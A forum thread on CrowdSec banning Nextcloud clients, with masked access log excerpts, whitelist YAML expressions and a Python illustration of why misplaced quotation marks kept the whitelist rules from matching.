xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012724915251034f3b47f&x=256&y=256 HTTP/1.1" 404 6535 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012829845251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012836525251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012836035251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012836795251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012835565251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012835745251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012836325251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012835465251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012836425251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012836225251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012836125251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012835645251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012835935251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012836705251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7585 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012836885251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012836615251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012835845251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012842925251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/core/preview?fileId=012842825251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7583 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"

Hey, what whitelists have you tried so far?

@iiAmLoz My Nextcloud installation is reachable on <domain>/cloud and I tried the following:

- evt.Parsed.request contains "'/cloud/remote.php'"
- evt.Parsed.request contains "'/cloud/index.php'"
- evt.Parsed.request contains "'preview?fileId'"

I even tried - evt.Parsed.request contains "'/cloud/'" without success.

Hi,

I’m also interested in a whitelist solution, as I have a similar problem with the Nextcloud Bookmarks app…
Seems like Nextcloud devs don’t worry about generating a lot of HTTP errors :wink:

@smu44 just take a look at your server’s access log and whitelist part of the last URLs before the ban. i.e.:

```yaml
name: my-whitelist-for-NC
description: my custom whitelists
whitelist:
  reason: my whitelist for NC
  expression:
    - "evt.Parsed.request contains '/nextcloud/apps/'"
    - "evt.Parsed.request contains '/nextcloud/remote.php/dav/'"
    - "evt.Parsed.request contains '/nextcloud/index.php/'"
    - "evt.Parsed.request contains '/nextcloud/avatar/'"
```

Take a look at your double quotation marks. The first has to be at the beginning.

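Why the first set of expressions never matched while the corrected quoting does, as an added example that is not from any poster or from CrowdSec: a simplified Python model (not CrowdSec's YAML or expression parser) of the two quote-stripping layers, run against request paths taken from the log lines quoted earlier in the thread. All function names are hypothetical.

```python
import re

# Request paths copied from the access log lines quoted in this thread.
REQUESTS = [
    "/cloud/index.php/204",
    "/cloud/index.php/core/preview?fileId=012836525251034f3b47f&x=256&y=256",
    "/cloud/ocs/v2.php/apps/notifications/api/v2/notifications",
]

EXPR_RE = re.compile(r"^evt\.Parsed\.request contains (?P<lit>.+)$")


def yaml_scalar(item):
    """Simplified YAML layer: a list item wrapped in one matching pair of
    quotes loses that pair; a plain (unquoted) scalar is kept verbatim,
    inner quote characters included. Escape sequences are not modelled."""
    item = item.strip()
    if len(item) >= 2 and item[0] == item[-1] and item[0] in "\"'":
        return item[1:-1]
    return item


def expr_literal(expression):
    """Simplified expression layer: return the string literal that follows
    `contains`, with only its own outer pair of quotes removed."""
    m = EXPR_RE.match(expression)
    if not m:
        raise ValueError(f"unsupported expression: {expression!r}")
    lit = m.group("lit")
    if len(lit) < 2 or lit[0] != lit[-1] or lit[0] not in "\"'":
        raise ValueError(f"not a quoted string literal: {lit!r}")
    return lit[1:-1]


def report(yaml_item):
    """Return (substring actually searched for, sample requests matched)."""
    needle = expr_literal(yaml_scalar(yaml_item))
    return needle, sum(needle in r for r in REQUESTS)


if __name__ == "__main__":
    # As first tried: plain scalar, so the inner single quotes stay in the needle.
    print(report("""evt.Parsed.request contains "'/cloud/index.php'" """))
    # As corrected: double quotes wrap the whole expression.
    print(report(""" "evt.Parsed.request contains '/cloud/index.php'" """))
```

With the original quoting the substring being searched for still carries the single quotes, which no request path contains, so nothing is whitelisted.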

Sorry for the late answer.
Can’t say for sure, but probably yes.
I’m using subdirectories, so the whitelist rule is as follows:
- "evt.Parsed.request contains '/ombi/api/v'"

But now I switched to subdomains and ombi is now at ombi.example.com.
Is it safe to whitelist all my subdomains (ombi, jellyfin, nextcloud, and onlyoffice) or would this break functionality?
Suggestion: - "evt.Parsed.request contains 'ombi.example.com'"
I always feel like I should not put too many or too general URLs into the whitelist…

Thanks, I’ve made the correction. :+1:

That simple, really? Dumb me! :flushed:
Thank you very much!